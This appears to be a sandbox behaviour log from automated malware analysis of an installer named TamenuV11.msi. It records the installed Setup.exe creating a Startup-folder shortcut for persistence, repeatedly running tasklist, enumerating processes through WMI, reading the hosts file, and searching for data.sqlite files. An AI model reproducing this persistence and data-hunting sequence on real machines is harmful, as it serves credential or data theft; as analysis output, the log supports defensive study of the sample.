Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\System32\msiexec.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: TamenuV11.msi

Static file information: TRID: Microsoft Windows Installer (60509/1) 88.31%

Source: Shortcut.exe

String found in binary or memory: -help

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\TamenuV11.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1688 --field-trial-handle=1692,i,14834755097693353692,10985245987311762671,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe /A:C "/F:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.lnk" /T:C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where /r . data.sqlite
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2248 --field-trial-handle=1692,i,14834755097693353692,10985245987311762671,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: unknown	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1648 --field-trial-handle=1764,i,3145727516655865599,8822023245888026874,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2304 --field-trial-handle=1764,i,3145727516655865599,8822023245888026874,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where /r . data.sqlite
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\where.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1688 --field-trial-handle=1692,i,14834755097693353692,10985245987311762671,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe /A:C "/F:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.lnk" /T:C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2248 --field-trial-handle=1692,i,14834755097693353692,10985245987311762671,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
